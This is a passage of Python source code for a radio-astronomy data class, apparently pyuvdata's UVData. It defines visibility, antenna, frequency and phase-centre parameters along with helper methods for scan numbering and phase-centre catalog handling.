"Npols) or (Nblts, Nfreqs, Npols) if future_array_shapes=True, "
"type = complex float, in units of self.vis_units"
)
# TODO: Spw axis to be collapsed in future release
self._data_array = uvp.UVParameter(
"data_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=complex,
)
desc = 'Visibility units, options are: "uncalib", "Jy" or "K str"'
self._vis_units = uvp.UVParameter(
"vis_units",
description=desc,
form="str",
expected_type=str,
acceptable_vals=["uncalib", "Jy", "K str"],
)
desc = (
"Number of data points averaged into each data element, "
"NOT required to be an integer, type = float, same shape as data_array."
"The product of the integration_time and the nsample_array "
"value for a visibility reflects the total amount of time "
"that went into the visibility. Best practice is for the "
"nsample_array to be used to track flagging within an integration_time "
"(leading to a decrease of the nsample array value below 1) and "
"LST averaging (leading to an increase in the nsample array "
"value). So datasets that have not been LST averaged should "
"have nsample array values less than or equal to 1."
"Note that many files do not follow this convention, but it is "
"safe to assume that the product of the integration_time and "
"the nsample_array is the total amount of time included in a visibility."
)
self._nsample_array = uvp.UVParameter(
"nsample_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=float,
)
desc = "Boolean flag, True is flagged, same shape as data_array."
self._flag_array = uvp.UVParameter(
"flag_array",
description=desc,
form=("Nblts", 1, "Nfreqs", "Npols"),
expected_type=bool,
)
self._Nspws = uvp.UVParameter(
"Nspws",
description="Number of spectral windows "
"(ie non-contiguous spectral chunks). ",
expected_type=int,
)
self._spw_array = uvp.UVParameter(
"spw_array",
description="Array of spectral window numbers, shape (Nspws)",
form=("Nspws",),
expected_type=int,
)
desc = (
"Projected baseline vectors relative to phase center, "
"shape (Nblts, 3), units meters. "
"Convention is: uvw = xyz(ant2) - xyz(ant1)."
"Note that this is the Miriad convention but it is different "
"from the AIPS/FITS convention (where uvw = xyz(ant1) - xyz(ant2))."
)
self._uvw_array = uvp.UVParameter(
"uvw_array",
description=desc,
form=("Nblts", 3),
expected_type=float,
acceptable_range=(0, 1e8),
tols=1e-3,
)
desc = (
"Array of times, center of integration, shape (Nblts), " "units Julian Date"
)
self._time_array = uvp.UVParameter(
"time_array",
description=desc,
form=("Nblts",),
expected_type=float,
tols=1e-3 / (60.0 * 60.0 * 24.0),
) # 1 ms in days
desc = (
"Array of local apparent sidereal times (LAST) at the center of "
"integration, shape (Nblts), units radians."
)
self._lst_array = uvp.UVParameter(
"lst_array",
description=desc,
form=("Nblts",),
expected_type=float,
tols=radian_tol,
)
desc = (
"Array of numbers for the first antenna, which is matched to that in "
"the antenna_numbers attribute. Shape (Nblts), type = int."
)
self._ant_1_array = uvp.UVParameter(
"ant_1_array", description=desc, expected_type=int, form=("Nblts",)
)
desc = (
"Array of numbers for the second antenna, which is matched to that in "
"the antenna_numbers attribute. Shape (Nblts), type = int."
)
self._ant_2_array = uvp.UVParameter(
"ant_2_array", description=desc, expected_type=int, form=("Nblts",)
)
desc = (
"Array of baseline numbers, shape (Nblts), "
"type = int; baseline = 2048 * (ant1+1) + (ant2+1) + 2^16"
)
self._baseline_array = uvp.UVParameter(
"baseline_array", description=desc, expected_type=int, form=("Nblts",),
)
# this dimensionality of freq_array does not allow for different spws
# to have different dimensions
desc = (
"Array of frequencies, center of the channel, "
"shape (1, Nfreqs) or (Nfreqs,) if future_array_shapes=True, units Hz"
)
# TODO: Spw axis to be collapsed in future release
self._freq_array = uvp.UVParameter(
"freq_array",
description=desc,
form=(1, "Nfreqs"),
expected_type=float,
tols=1e-3,
) # mHz
desc = (
"Array of polarization integers, shape (Npols). "
"AIPS Memo 117 says: pseudo-stokes 1:4 (pI, pQ, pU, pV); "
"circular -1:-4 (RR, LL, RL, LR); linear -5:-8 (XX, YY, XY, YX). "
"NOTE: AIPS Memo 117 actually calls the pseudo-Stokes polarizations "
'"Stokes", but this is inaccurate as visibilities cannot be in '
"true Stokes polarizations for physical antennas. We adopt the "
"term pseudo-Stokes to refer to linear combinations of instrumental "
"visibility polarizations (e.g. pI = xx + yy)."
)
self._polarization_array = uvp.UVParameter(
"polarization_array",
description=desc,
expected_type=int,
acceptable_vals=list(np.arange(-8, 0)) + list(np.arange(1, 5)),
form=("Npols",),
)
desc = (
"Length of the integration in seconds, shape (Nblts). "
"The product of the integration_time and the nsample_array "
"value for a visibility reflects the total amount of time "
"that went into the visibility. Best practice is for the "
"integration_time to reflect the length of time a visibility "
"was integrated over (so it should vary in the case of "
"baseline-dependent averaging and be a way to do selections "
"for differently integrated baselines)."
"Note that many files do not follow this convention, but it is "
"safe to assume that the product of the integration_time and "
"the nsample_array is the total amount of time included in a visibility."
)
self._integration_time = uvp.UVParameter(
"integration_time",
description=desc,
form=("Nblts",),
expected_type=float,
tols=1e-3,
) # 1 ms
desc = (
"Width of frequency channels (Hz). If flex_spw = False and "
"future_array_shapes=False, then it is a "
"single value of type = float, otherwise it is an array of shape "
"(Nfreqs), type = float."
)
self._channel_width = uvp.UVParameter(
"channel_width", description=desc, expected_type=float, tols=1e-3,
) # 1 mHz
desc = (
"Name(s) of source(s) or field(s) observed, type string. If "
'multi_phase_center = True, set to "multi".'
)
self._object_name = uvp.UVParameter(
"object_name", description=desc, form="str", expected_type=str,
)
# --- multi phase center handling ---
desc = (
'Only relevant if phase_type = "phased". Specifies the that the data set '
"contains multiple sources within it."
)
self._multi_phase_center = uvp.UVParameter(
"multi_phase_center", description=desc, expected_type=bool, value=False,
)
desc = (
"Required if multi_phase_center = True. Specifies the number of sources "
"contained within the data set."
)
self._Nphase = uvp.UVParameter(
"Nphase", description=desc, expected_type=int, required=False,
)
desc = (
"Only relevant if multi_phase_center = True. Dictionary that acts as a "
"catalog, containing information on individual phase centers. Keys are the "
"names of the different phase centers in the UVData object. At a minimum, "
'each dictionary must contain the key "cat_type", which can be either '
'"sidereal" (fixed position in RA/Dec), "ephem" (position in RA/Dec which'
'moves with time), "driftscan" (fixed postion in Az/El, NOT the same as '
'`phase_type`="drift") and "unphased" (baseline coordinates in ENU, but '
'data are not phased, similar to `phase_type`="drift"). Other typical '
'keyworks include "cat_lon" (longitude coord, e.g. RA), "cat_lat" '
'(latitude coord, e.g. Dec.), "cat_frame" (coordinate frame, e.g. '
'icrs), "cat_epoch" (epoch and equinox of the coordinate frame), '
'"cat_times" (times for the coordinates, only used for "ephem" '
'types), "cat_pm_ra" (proper motion in RA), "cat_pm_dec" (proper '
'motion in Dec), "cat_dist" (physical distance), "cat_vrad" ('
'rest frame velocity), "info_source" (describes where catalog info came '
'from), and "cat_id" (matched to the parameter `phase_center_id_array`. '
"See the documentation of the `phase` method for more details."
)
self._phase_center_catalog = uvp.UVParameter(
"phase_center_catalog",
description=desc,
expected_type=dict,
required=False,
)
self._telescope_name = uvp.UVParameter(
"telescope_name",
description="Name of telescope " "(string)",
form="str",
expected_type=str,
)
self._instrument = uvp.UVParameter(
"instrument",
description="Receiver or backend. " "Sometimes identical to telescope_name",
form="str",
expected_type=str,
)
desc = (
"Telescope location: xyz in ITRF (earth-centered frame). "
"Can also be accessed using telescope_location_lat_lon_alt or "
"telescope_location_lat_lon_alt_degrees properties"
)
self._telescope_location = uvp.LocationParameter(
"telescope_location",
description=desc,
acceptable_range=(6.35e6, 6.39e6),
tols=1e-3,
)
self._history = uvp.UVParameter(
"history",
description="String of history, units English",
form="str",
expected_type=str,
)
# --- flexible spectral window information ---
desc = (
'Option to construct a "flexible spectral window", which stores'
"all spectral channels across the frequency axis of data_array. "
"Allows for spectral windows of variable sizes, and channels of "
"varying widths."
)
self._flex_spw = uvp.UVParameter(
"flex_spw", description=desc, expected_type=bool, value=False,
)
desc = (
"Required if flex_spw = True. Maps individual channels along the "
"frequency axis to individual spectral windows, as listed in the "
"spw_array. Shape (Nfreqs), type = int."
)
self._flex_spw_id_array = uvp.UVParameter(
"flex_spw_id_array",
description=desc,
form=("Nfreqs",),
expected_type=int,
required=False,
)
desc = "Flag indicating that this object is using the future array shapes."
self._future_array_shapes = uvp.UVParameter(
"future_array_shapes", description=desc, expected_type=bool, value=False,
)
# --- phasing information ---
desc = (
'String indicating phasing type. Allowed values are "drift" and '
'"phased" (n.b., "drift" is not the same as `cat_type="driftscan"`, '
"the latter of which _is_ phased to a fixed az-el position)."
)
self._phase_type = uvp.UVParameter(
"phase_type",
form="str",
expected_type=str,
description=desc,
value=None,
acceptable_vals=["drift", "phased"],
)
desc = (
'Required if phase_type = "phased". Epoch year of the phase '
"applied to the data (eg 2000.)"
)
self._phase_center_epoch = uvp.UVParameter(
"phase_center_epoch", required=False, description=desc, expected_type=float,
)
desc = (
"Required if phase_type = 'phased'. Right ascension of phase "
"center (see uvw_array), units radians. Can also be accessed using "
"phase_center_ra_degrees."
)
self._phase_center_ra = uvp.AngleParameter(
"phase_center_ra",
required=False,
description=desc,
expected_type=float,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Declination of phase center '
"(see uvw_array), units radians. Can also be accessed using "
"phase_center_dec_degrees."
)
self._phase_center_dec = uvp.AngleParameter(
"phase_center_dec",
required=False,
description=desc,
expected_type=float,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Apparent right ascension of phase '
"center in the topocentric frame of the observatory, units radians."
"Shape (Nblts,), type = float."
)
self._phase_center_app_ra = uvp.AngleParameter(
"phase_center_app_ra",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Declination of phase center '
"in the topocentric frame of the observatory, units radians. "
"Shape (Nblts,), type = float."
)
self._phase_center_app_dec = uvp.AngleParameter(
"phase_center_app_dec",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=radian_tol,
)
desc = (
'Required if phase_type = "phased". Position angle between the hour '
"circle (which is a great circle that goes through the target postion and "
"both poles) in the apparent/topocentric frame, and the frame given in "
"the phase_center_frame attribute."
"Shape (Nblts,), type = float."
)
# The tolerance here is set by the fact that is is calculated using an arctan,
# the limiting precision of which happens around values of 1.
self._phase_center_frame_pa = uvp.AngleParameter(
"phase_center_frame_pa",
required=False,
form=("Nblts",),
expected_type=float,
description=desc,
tols=2e-8,
)
desc = (
'Only relevant if phase_type = "phased". Specifies the frame the'
' data and uvw_array are phased to. Options are "icrs", "gcrs", and "fk5";'
' default is "icrs"'
)
self._phase_center_frame = uvp.UVParameter(
"phase_center_frame",
required=False,
description=desc,
expected_type=str,
acceptable_vals=["icrs", "gcrs", "fk5"],
)
desc = (
"Required if multi_phase_center = True. Maps individual indices along the "
"Nblt axis to an entry in `phase_center_catalog`, with the ID number of "
"individual entries stored as `cat_id`, along with other metadata. "
"Shape (Nblts), type = int."
)
self._phase_center_id_array = uvp.UVParameter(
"phase_center_id_array",
description=desc,
form=("Nblts",),
expected_type=int,
required=False,
)
desc = (
"Optional when reading a MS. Retains the scan number when reading a MS."
" Shape (Nblts), type = int."
)
self._scan_number_array = uvp.UVParameter(
"scan_number_array",
description=desc,
form=("Nblts",),
expected_type=int,
required=False,
)
# --- antenna information ----
desc = (
"Number of antennas with data present (i.e. number of unique "
"entries in ant_1_array and ant_2_array). May be smaller "
"than the number of antennas in the array"
)
self._Nants_data = uvp.UVParameter(
"Nants_data", description=desc, expected_type=int
)
desc = (
"Number of antennas in the array. May be larger "
"than the number of antennas with data"
)
self._Nants_telescope = uvp.UVParameter(
"Nants_telescope", description=desc, expected_type=int
)
desc = (
"List of antenna names, shape (Nants_telescope), "
"with numbers given by antenna_numbers (which can be matched "
"to ant_1_array and ant_2_array). There must be one entry "
"here for each unique entry in ant_1_array and "
"ant_2_array, but there may be extras as well. "
)
self._antenna_names = uvp.UVParameter(
"antenna_names",
description=desc,
form=("Nants_telescope",),
expected_type=str,
)
desc = (
"List of integer antenna numbers corresponding to antenna_names, "
"shape (Nants_telescope). There must be one "
"entry here for each unique entry in ant_1_array and "
"ant_2_array, but there may be extras as well."
"Note that these are not indices -- they do not need to start "
"at zero or be continuous."
)
self._antenna_numbers = uvp.UVParameter(
"antenna_numbers",
description=desc,
form=("Nants_telescope",),
expected_type=int,
)
desc = (
"Array giving coordinates of antennas relative to "
"telescope_location (ITRF frame), shape (Nants_telescope, 3), "
"units meters. See the tutorial page in the documentation "
"for an example of how to convert this to topocentric frame."
)
self._antenna_positions = uvp.UVParameter(
"antenna_positions",
description=desc,
form=("Nants_telescope", 3),
expected_type=float,
tols=1e-3, # 1 mm
)
# -------- extra, non-required parameters ----------
desc = (
"Orientation of the physical dipole corresponding to what is "
"labelled as the x polarization. Options are 'east' "
"(indicating east/west orientation) and 'north (indicating "
"north/south orientation)"
)
self._x_orientation = uvp.UVParameter(
"x_orientation",
description=desc,
required=False,
expected_type=str,
acceptable_vals=["east", "north"],
)
blt_order_options = ["time", "baseline", "ant1", "ant2", "bda"]
desc = (
"Ordering of the data array along the blt axis. A tuple with "
'the major and minor order (minor order is omitted if order is "bda"). '
"The allowed values are: "
+ " ,".join([str(val) for val in blt_order_options])
)
self._blt_order = uvp.UVParameter(
"blt_order",
description=desc,
form=(2,),
required=False,
expected_type=str,
acceptable_vals=blt_order_options,
)
desc = (
"Any user supplied extra keywords, type=dict. Keys should be "
"8 character or less strings if writing to uvfits or miriad files. "
'Use the special key "comment" for long multi-line string comments.'
)
self._extra_keywords = uvp.UVParameter(
"extra_keywords",
required=False,
description=desc,
value={},
spoof_val={},
expected_type=dict,
)
desc = (
"Array of antenna diameters in meters. Used by CASA to "
"construct a default beam if no beam is supplied."
)
self._antenna_diameters = uvp.UVParameter(
"antenna_diameters",
required=False,
description=desc,
form=("Nants_telescope",),
expected_type=float,
tols=1e-3, # 1 mm
)
# --- other stuff ---
# the below are copied from AIPS memo 117, but could be revised to
# merge with other sources of data.
self._gst0 = uvp.UVParameter(
"gst0",
required=False,
description="Greenwich sidereal time at " "midnight on reference date",
spoof_val=0.0,
expected_type=float,
)
self._rdate = uvp.UVParameter(
"rdate",
required=False,
description="Date for which the GST0 or " "whatever... applies",
spoof_val="",
form="str",
)
self._earth_omega = uvp.UVParameter(
"earth_omega",
required=False,
description="Earth's rotation rate " "in degrees per day",
spoof_val=360.985,
expected_type=float,
)
self._dut1 = uvp.UVParameter(
"dut1",
required=False,
description="DUT1 (google it) AIPS 117 " "calls it UT1UTC",
spoof_val=0.0,
expected_type=float,
)
self._timesys = uvp.UVParameter(
"timesys",
required=False,
description="We only support UTC",
spoof_val="UTC",
form="str",
)
desc = (
"FHD thing we do not understand, something about the time "
"at which the phase center is normal to the chosen UV plane "
"for phasing"
)
self._uvplane_reference_time = uvp.UVParameter(
"uvplane_reference_time", required=False, description=desc, spoof_val=0
)
desc = "Per-antenna and per-frequency equalization coefficients"
self._eq_coeffs = uvp.UVParameter(
"eq_coeffs",
required=False,
description=desc,
form=("Nants_telescope", "Nfreqs"),
expected_type=float,
spoof_val=1.0,
)
desc = "Convention for how to remove eq_coeffs from data"
self._eq_coeffs_convention = uvp.UVParameter(
"eq_coeffs_convention",
required=False,
description=desc,
form="str",
spoof_val="divide",
)
desc = (
"List of strings containing the unique basenames (not the full path) of "
"input files."
)
self._filename = uvp.UVParameter(
"filename", required=False, description=desc, expected_type=str,
)
super(UVData, self).__init__()
def _set_flex_spw(self):
"""
Set flex_spw to True, and adjust required parameters.
This method should not be called directly by users; instead it is called
by the file-reading methods to indicate that an object has multiple spectral
windows concatenated together across the frequency axis.
"""
# Mark once-optional arrays as now required
self.flex_spw = True
self._flex_spw_id_array.required = True
# Now make sure that chan_width is set to be an array
self._channel_width.form = ("Nfreqs",)
def _set_scan_numbers(self, override=False):
"""
Set scan numbers by grouping consecutive integrations on the same phase center.
This approach mimics the definition of scan number in measurement sets and is
especially helpful for distinguishing between repeated visits to multiple
phase centers.
Parameters
----------
override : bool
When True, will redefine existing scan numbers. Default is False.
"""
if self.scan_number_array is None or override:
# We are grouping based on integrations on a phase center.
# If this isn't defined, we cannot define scan numbers in this way
# and default to a single "scan".
if self.phase_center_catalog is None:
self.scan_number_array = np.ones((self.Nblts,), dtype=int)
else:
sou_list = list(self.phase_center_catalog.keys())
sou_list.sort()
slice_list = []
# This loops over phase centers, finds contiguous integrations with
# ndimage.label, and then finds the slices to return those contiguous
# integrations with nd.find_objects.
for idx in range(self.Nphase):
sou_id = self.phase_center_catalog[sou_list[idx]]["cat_id"]
slice_list.extend(
nd.find_objects(
nd.label(self.phase_center_id_array == sou_id)[0]
)
)
# Sort by start integration number, which we can extract from
# the start of each slice in the list.
slice_list_ord = sorted(slice_list, key=lambda x: x[0].start)
# Incrementally increase the scan number with each group in
# slice_list_ord
scan_array = np.zeros_like(self.phase_center_id_array)
for ii, slice_scan in enumerate(slice_list_ord):
scan_array[slice_scan] = ii + 1
self.scan_number_array = scan_array
def _look_in_catalog(
self,
cat_name,
phase_dict=None,
cat_type=None,
cat_lon=None,
cat_lat=None,
cat_frame=None,
cat_epoch=None,
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
ignore_name=False,
):
"""
Check the catalog to see if an existing entry matches provided data.
This is a helper function for verifying if an entry already exists within
the catalog, contained within the attribute `phase_center_catalog`.
Parameters
----------
cat_name : str
Name of the phase center, which should match a key in
`phase_center_catalog`.
phase_dict : dict
Instead of providing individual parameters, one may provide a dict which
matches that format used within `phase_center_catalog` for checking for
existing entries. If used, all other parameters (save for `ignore_name` and
`cat_name`) are disregarded.
cat_type : str
Type of phase center of the entry. Must be one of:
"sidereal" (fixed RA/Dec),
"ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position),
"unphased" (no w-projection, equivalent to `phase_type` == "drift").
cat_lon : float or ndarray
Value of the longitudinal coordinate (e.g., RA, Az, l) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_lat : float or ndarray
Value of the latitudinal coordinate (e.g., Dec, El, b) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_frame : str
Coordinate frame that cat_lon and cat_lat are given in. Only used for
sidereal and ephem phase centers. Can be any of the several supported frames
in astropy (a limited list: fk4, fk5, icrs, gcrs, cirs, galactic).
cat_epoch : str or float
Epoch of the coordinates, only used when cat_frame = fk4 or fk5. Given
in unites of fractional years, either as a float or as a string with the
epoch abbreviation (e.g, Julian epoch 2000.0 would be J2000.0).
cat_times : ndarray of floats
Only used when `cat_type="ephem"`. Describes the time for which the values
of `cat_lon` and `cat_lat` are caclulated, in units of JD. Shape is (Npts,).
cat_pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
cat_pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
cat_dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
ignore_name : bool
Nominally, `_look_in_catalog` will only look at entries where `cat_name`
matches the name of an entry in the catalog. However, by setting this to
True, the method will search all entries in the catalog and see if any
match all of the provided data (excluding `cat_name`).
Returns
-------
cat_id : int or None
The unique ID number for the phase center added to the internal catalog.
This value is used in the `phase_center_id_array` attribute to denote which
source a given baseline-time corresponds to. If no catalog entry matches,
then None is returned.
cat_diffs : int
The number of differences between the information provided and the catalog
entry contained within `phase_center_catalog`. If everything matches, then
`cat_diffs=0`.
"""
# 1 marcsec tols
radian_tols = (0, 1 * 2 * np.pi * 1e-3 / (60.0 * 60.0 * 360.0))
default_tols = (1e-5, 1e-8)
cat_id = None
cat_diffs = 0
# Emulate the defaults that are set if None is detected for
# unphased and driftscan types.
if (cat_type == "unphased") or (cat_type == "driftscan"):
if cat_lon is None:
cat_lon = 0.0
if cat_lat is None:
cat_lat = np.pi / 2
if cat_frame is None:
cat_frame = "altaz"
if phase_dict is None:
phase_dict = {
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_dist": cat_dist,
"cat_vrad": cat_vrad,
}
if self.multi_phase_center:
check_dict = self.phase_center_catalog
else:
check_dict = {}
is_phased = self.phase_type == "phased"
check_dict[self.object_name] = {
"cat_type": "sidereal" if is_phased else "unphased",
"cat_lon": self.phase_center_ra if is_phased else 0.0,
"cat_lat": self.phase_center_dec if is_phased else np.pi / 2.0,
"cat_frame": self.phase_center_frame if is_phased else "altaz",
"cat_epoch": self.phase_center_epoch if is_phased else None,
"cat_times": None,
"cat_pm_ra": None,
"cat_pm_dec": None,
"cat_dist": None,
"cat_vrad": None,
"cat_id": 0,
}
tol_dict = {
"cat_type": None,
"cat_lon": radian_tols,
"cat_lat": radian_tols,
"cat_frame": None,
"cat_epoch": None,
"cat_times": default_tols,
"cat_pm_ra": default_tols,
"cat_pm_dec": default_tols,
"cat_dist": default_tols,
"cat_vrad": default_tols,
}
if self.multi_phase_center:
name_list = list(self.phase_center_catalog.keys())
else:
name_list = [self.object_name]
for name in name_list:
cat_diffs = 0
if (cat_name != name) and (not ignore_name):
continue
for key in tol_dict.keys():
if phase_dict.get(key) is not None:
if check_dict[name].get(key) is None:
cat_diffs += 1
elif tol_dict[key] is None:
# If no tolerance specified, expect attributes to be identical
cat_diffs += phase_dict.get(key) != check_dict[name].get(key)
else:
# Numpy will throw a Value error if you have two arrays
# of different shape, which we can catch to flag that
# the two arrays are actually not within tolerance.
if np.shape(phase_dict[key]) != np.shape(check_dict[name][key]):
cat_diffs += 1
else:
cat_diffs += not np.allclose(
phase_dict[key],
check_dict[name][key],
tol_dict[key][0],
tol_dict[key][1],
)
else:
cat_diffs += check_dict[name][key] is not None
if (cat_diffs == 0) or (cat_name == name):
cat_id = check_dict[name]["cat_id"]
break
return cat_id, cat_diffs
def _add_phase_center(
self,
cat_name,
cat_type=None,
cat_lon=None,
cat_lat=None,
cat_frame=None,
cat_epoch=None,
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
info_source="user",
force_update=False,
cat_id=None,
):
"""
Add an entry to the internal object/source catalog.
This is a helper function for adding a source to the internal
catalog, contained within the attribute `phase_center_catalog`.
Parameters
----------
cat_name : str
Name of the phase center to be added, must be unique (i.e., not contained
as a key in the UVData attribute `phase_center_catalog`).
cat_type : str
Type of phase center to be added. Must be one of:
"sidereal" (fixed RA/Dec),
"ephem" (RA/Dec that moves with time),
"driftscan" (fixed az/el position),
"unphased" (no w-projection, equivalent to `phase_type` == "drift").
cat_lon : float or ndarray
Value of the longitudinal coordinate (e.g., RA, Az, l) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_lat : float or ndarray
Value of the latitudinal coordinate (e.g., Dec, El, b) of the phase center.
No default, not used when `cat_type="unphased"`. Expected to be a float for
sidereal and driftscan phase centers, and an ndarray of floats of shape
(Npts,) for ephem phase centers.
cat_frame : str
Coordinate frame that cat_lon and cat_lat are given in. Only used
for sidereal and ephem targets. Can be any of the several supported frames
in astropy (a limited list: fk4, fk5, icrs, gcrs, cirs, galactic).
cat_epoch : str or float
Epoch of the coordinates, only used when cat_frame = fk4 or fk5. Given
in unites of fractional years, either as a float or as a string with the
epoch abbreviation (e.g, Julian epoch 2000.0 would be J2000.0).
cat_times : ndarray of floats
Only used when `cat_type="ephem"`. Describes the time for which the values
of `cat_lon` and `cat_lat` are caclulated, in units of JD. Shape is (Npts,).
cat_pm_ra : float
Proper motion in RA, in units of mas/year. Only used for sidereal phase
centers.
cat_pm_dec : float
Proper motion in Dec, in units of mas/year. Only used for sidereal phase
centers.
cat_dist : float or ndarray of float
Distance of the source, in units of pc. Only used for sidereal and ephem
phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
cat_vrad : float or ndarray of float
Radial velocity of the source, in units of km/s. Only used for sidereal and
ephem phase centers. Expected to be a float for sidereal and driftscan phase
centers, and an ndarray of floats of shape (Npts,) for ephem phase centers.
info_source : str
Optional string describing the source of the information provided. Used
primarily in UVData to denote when an ephemeris has been supplied by the
JPL-Horizons system, user-supplied, or read in by one of the various file
interpreters. Default is 'user'.
force_update : bool
Normally, `_add_phase_center` will throw an error if there already exists an
identically named phase center with different properties. However, if one
sets `force_update=True`, the method will overwrite the existing entry in
`phase_center_catalog` with the paramters supplied, preserving only the
parameters `cat_id` and `cat_name`. Note that doing this will _not_ update
other atributes of the `UVData` object. Default is False.
cat_id : int
An integer signifying the ID number for the phase center, used in the
`phase_center_id_array` attribute. The default is for the method to assign
this value automatically.
Returns
-------
cat_id : int
The unique ID number for the phase center added to the internal catalog.
This value is used in the `phase_center_id_array` attribute to denote which
source a given baseline-time corresponds to.
Raises
------
ValueError
If attempting to add a non-unique source name, attempting to use the method
w/ a UVData object where multi_phase_center=False, or if adding a sidereal
source without coordinates.
"""
# Check whether we should actually be doing this in the first place
if not self.multi_phase_center:
raise ValueError("Cannot add a source if multi_phase_center != True.")
if not isinstance(cat_name, str):
raise ValueError("cat_name must be a string.")
# The catalog name "unphased" is used internally whenever we have to make a
# block of data as unphased in a data set. To avoid naming collisions, check
# that someone hasn't tried to use it for any other purpose.
if (cat_name == "unphased") and (cat_type != "unphased"):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"cat_name."
)
# We currently only have 4 supported types -- make sure the user supplied
# one of those
if cat_type not in ["sidereal", "ephem", "driftscan", "unphased"]:
raise ValueError(
"Only sidereal, ephem, driftscan or unphased may be used "
"for cat_type."
)
# Both proper motion parameters need to be set together
if (cat_pm_ra is None) != (cat_pm_dec is None):
raise ValueError(
"Must supply values for either both or neither of "
"cat_pm_ra and cat_pm_dec."
)
# If left unset, unphased and driftscan defaulted to Az, El = (0, 90)
if (cat_type == "unphased") or (cat_type == "driftscan"):
if cat_lon is None:
cat_lon = 0.0
if cat_lat is None:
cat_lat = np.pi / 2
if cat_frame is None:
cat_frame = "altaz"
# Let's check some case-specific things and make sure all the entires are value
if (cat_times is None) and (cat_type == "ephem"):
raise ValueError("cat_times cannot be None for ephem object.")
elif (cat_times is not None) and (cat_type != "ephem"):
raise ValueError("cat_times cannot be used for non-ephem phase centers.")
if (cat_lon is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_lon cannot be None for sidereal phase centers.")
if (cat_lat is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_lat cannot be None for sidereal phase centers.")
if (cat_frame is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_frame cannot be None for sidereal phase centers.")
elif (cat_frame != "altaz") and (cat_type in ["driftscan", "unphased"]):
raise ValueError(
"cat_frame must be either None or 'altaz' when the cat type "
"is either driftscan or unphased."
)
if (cat_type == "unphased") and (cat_lon != 0.0):
raise ValueError(
"Catalog entries that are unphased must have cat_lon set to either "
"0 or None."
)
if (cat_type == "unphased") and (cat_lat != (np.pi / 2)):
raise ValueError(
"Catalog entries that are unphased must have cat_lat set to either "
"pi/2 or None."
)
if (cat_type != "sidereal") and (
(cat_pm_ra is not None) or (cat_pm_dec is not None)
):
raise ValueError(
"Non-zero proper motion values (cat_pm_ra, cat_pm_dec) "
"for cat types other than sidereal are not supported."
)
if isinstance(cat_epoch, Time) or isinstance(cat_epoch, str):
if cat_frame in ["fk4", "fk4noeterms"]:
cat_epoch = Time(cat_epoch).byear
else:
cat_epoch = Time(cat_epoch).jyear
elif cat_epoch is not None:
cat_epoch = float(cat_epoch)
if cat_type == "ephem":
cat_times = np.array(cat_times, dtype=float).reshape(-1)
cshape = cat_times.shape
try:
cat_lon = np.array(cat_lon, dtype=float).reshape(cshape)
cat_lat = np.array(cat_lat, dtype=float).reshape(cshape)
if cat_dist is not None:
cat_dist = np.array(cat_dist, dtype=float).reshape(cshape)
if cat_vrad is not None:
cat_vrad = np.array(cat_vrad, dtype=float).reshape(cshape)
except ValueError:
raise ValueError(
"Object properties -- lon, lat, pm_ra, pm_dec, dist, vrad -- must "
"be of the same size as cat_times for ephem phase centers."
)
else:
cat_lon = None if cat_lon is None else float(cat_lon)
cat_lat = None if cat_lat is None else float(cat_lat)
cat_pm_ra = None if cat_pm_ra is None else float(cat_pm_ra)
cat_pm_dec = None if cat_pm_dec is None else float(cat_pm_dec)
cat_dist = None if cat_dist is None else float(cat_dist)
cat_vrad = None if cat_vrad is None else float(cat_vrad)
# Names serve as dict keys, so we need to make sure that they're unique
if not force_update:
temp_id, cat_diffs = self._look_in_catalog(
cat_name,
cat_type=cat_type,
cat_lon=cat_lon,
cat_lat=cat_lat,
cat_frame=cat_frame,
cat_epoch=cat_epoch,
cat_times=cat_times,
cat_pm_ra=cat_pm_ra,
cat_pm_dec=cat_pm_dec,
cat_dist=cat_dist,
cat_vrad=cat_vrad,
)
# If the source does have the same name, check to see if all the
# atributes match. If so, no problem, go about your business
if temp_id is not None:
if cat_diffs == 0:
# Everything matches, return the catalog ID of the matching entry
return temp_id
else:
raise ValueError(
"Cannot add different source with an non-unique name."
)
# We want to create a unique ID for each source, for use in indexing arrays.
# The logic below ensures that we pick the lowest positive integer that is
# not currently being used by another source
used_cat_ids = {
self.phase_center_catalog[name]["cat_id"]: name
for name in self.phase_center_catalog.keys()
}
if force_update and (cat_name in self.phase_center_catalog.keys()):
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
elif cat_id is None:
cat_id = int(
